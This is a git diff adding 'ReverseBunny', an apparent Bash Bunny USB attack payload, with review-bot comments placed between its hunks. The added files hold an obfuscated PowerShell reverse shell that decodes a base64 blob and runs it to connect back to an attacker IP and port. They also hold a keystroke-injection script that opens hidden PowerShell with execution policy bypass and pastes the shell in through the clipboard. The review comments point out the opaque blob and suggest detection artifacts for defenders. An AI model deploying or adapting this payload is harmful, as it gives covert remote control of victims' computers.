diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md
new file mode 100644
index 00000000..7f478362
--- /dev/null
+++ b/payloads/library/remote_access/ReverseBunny/README.md
@@ -0,0 +1,12 @@
+Title: ReverseBunny
+
+Author: 0iphor13
+
+Version: 1.0
+
+
+Getting remote access via obfuscated reverse shell.
+ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB.
+
+# Red.............Payload running
+# Green .............Finished
diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
new file mode 100644
index 00000000..1aa4f158
--- /dev/null
+++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
@@ -0,0 +1 @@
+$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( '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' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'')
\ No newline at end of file
diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt
new file mode 100644
index 00000000..7f45b871
--- /dev/null
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
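Review bot: The deflated base64 string in the added ReverseBunny.txt line is opaque to anyone reviewing this commit — beyond the `$IP`/`$PORT` assignments in front of it, nothing in the repository shows what the decoded script contains, and the trailing `. ( ... )` invocation runs whatever it decodes to. For a shared payload library that is a supply-chain concern: a user cannot confirm the blob does only what the README's one-line description claims, and a maintainer cannot regenerate it after a fix. Please commit the readable source the blob was generated from (or a documented build step that produces this line), and state in the README that the `'0.0.0.0'`/`4444` values are placeholders that must be replaced before use.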
@@ -0,0 +1,30 @@
+# Title: ReverseBunny
+# Description: Obfuscated reverse shell, executed via powershell
+# Author: 0iphor13
+# Version: 1.0
+# Category: Execution
+# Attackmodes: HID, Storage
+
+GET SWITCH_POSITION
+ATTACKMODE HID STORAGE
+DUCKY_LANG de
+
+#LED RED - DON'T EJECT - PAYLOAD RUNNING
+
+LED R FAST
+
+DELAY 5000
+RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
+DELAY 2000
+
+Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))"
+DELAY 5000
+Q ENTER
+DELAY 5000
+Q CONTROL v
+DELAY 5000
+Q ENTER
+
+LED FINISH
+
+#SAVE TO EJECT
\ No newline at end of file
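Review bot: The `# Category: Execution` header at the top of the hunk disagrees with the file's location under `payloads/library/remote_access/`; either the header or the directory should change so the library index stays consistent. `DUCKY_LANG de` pins the typed keystrokes to a German keyboard layout, which neither the headers nor the README mention — a header comment such as `# Keyboard: German layout (DUCKY_LANG de); adjust for other layouts` would document it. The README only documents `$IP`/`$PORT`, so it should also say that the `Q STRING` line reads `ReverseBunny.txt` from the `payloads\$SWITCH_POSITION` folder of the volume labelled `BashBunny`, which is what its "present on the BB" wording needs to mean. For teams using this as a detection test case, the observable artifacts are already in the hunk — the `RUN WIN` launch of powershell with `-NoP -W hidden -NonI -Exec Bypass` and the clipboard paste via `Set-Clipboard` followed by `CONTROL v` — and listing them in the README would make the payload more useful for validating logging and alert coverage.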